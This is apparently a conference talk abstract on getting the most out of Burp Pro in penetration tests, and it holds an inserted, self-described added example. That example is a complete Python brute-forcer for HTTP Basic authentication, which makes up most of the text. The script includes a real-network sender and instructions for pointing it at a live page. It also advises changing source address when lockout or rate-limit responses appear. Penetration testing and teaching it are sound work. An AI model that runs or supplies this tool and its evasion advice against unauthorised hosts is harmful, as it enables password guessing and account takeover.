Many services are delivered over the Web. Pentesters spend a large share of their time testing Web applications, Web Services, REST and JSON interfaces, mobile applications and thick clients. For all of these assessments, an interactive HTTP proxy is mandatory to intercept, analyze, modify and replay the traffic, and Burp Pro is the de facto tool for the job. This presentation distills many years of experience with the tool and addresses real-life situations. Topics covered: recent features such as Burp Extender, testing of mobile applications, automated scanning despite CSRF tokens (using "Recursive Grep" or Macros) and session logout, interactive parsing and manipulation of items, useful tricks such as shortcuts and backups, efficient brute-forcing of BasicAuth forms, ...
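The BasicAuth brute-forcing item deserves a concrete illustration of what Burp Intruder is actually doing when you combine a "cluster bomb" attack with a base64 payload-processing rule. The script below is an added example, not code from the talk or from Burp: it builds every user/password combination, encodes each as an `Authorization: Basic` header, and sends candidates until one stops returning 401. The wordlists and the in-process fake target (which only knows the constructed credential `operator:s3cret`) are assumptions for the demo; `http_sender` is the real-network variant a practitioner would point at an actual host.

```python
"""Brute-forcing HTTP Basic authentication the way Burp Intruder does it
(cluster bomb over users x passwords, base64-encoded into the header).
Added example with constructed inputs; not the talk's own code."""
import base64
import itertools
import urllib.error
import urllib.request

# Constructed wordlists for the demo (assumption); real runs use larger ones.
USERS = ["admin", "operator"]
PASSWORDS = ["password", "letmein", "s3cret"]


def basic_auth_value(user: str, password: str) -> str:
    """Authorization header value: 'Basic ' + base64('user:password')."""
    raw = f"{user}:{password}".encode()
    return "Basic " + base64.b64encode(raw).decode()


def candidate_headers(users, passwords):
    """Yield (user, password, header) for every combination, i.e. the
    cluster-bomb payload set after the base64 processing rule."""
    for user, password in itertools.product(users, passwords):
        yield user, password, basic_auth_value(user, password)


def fake_server(valid_user: str, valid_pass: str):
    """In-process stand-in for a BasicAuth-protected page (assumption for
    offline use): returns 200 only for the expected header, else 401."""
    expected = basic_auth_value(valid_user, valid_pass)

    def send(header_value: str) -> int:
        return 200 if header_value == expected else 401

    return send


def http_sender(url: str, timeout: float = 5.0):
    """Real-network sender: returns the HTTP status for one candidate header."""

    def send(header_value: str) -> int:
        req = urllib.request.Request(url, headers={"Authorization": header_value})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code

    return send


def brute_force(send, users, passwords):
    """Try each candidate; stop at the first non-401 answer.
    Returns (user, password, status) or None. A status other than 200/401
    (403, 429, 5xx) is returned too: it usually means lockout or rate
    limiting, which the tester must notice rather than keep hammering."""
    for user, password, header in candidate_headers(users, passwords):
        status = send(header)
        if status != 401:
            return user, password, status
    return None


if __name__ == "__main__":
    target = fake_server("operator", "s3cret")  # constructed credential
    print(brute_force(target, USERS, PASSWORDS))
```

The fake target is there only so the script runs offline; swap `fake_server(...)` for `http_sender("http://host/protected/")` to hit a real page. Note that `brute_force` deliberately stops on any non-401 status, since a sudden 403 or 429 mid-run is the signal to slow down or change source address rather than a hit.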
Nicolas Grégoire (@agarri_fr), electronic-sheep-herder from the beautiful South of France, will show how to get the most out of Burp Pro during pen-tests. A must-see for serious offensive security folks who like to do more than just click buttons.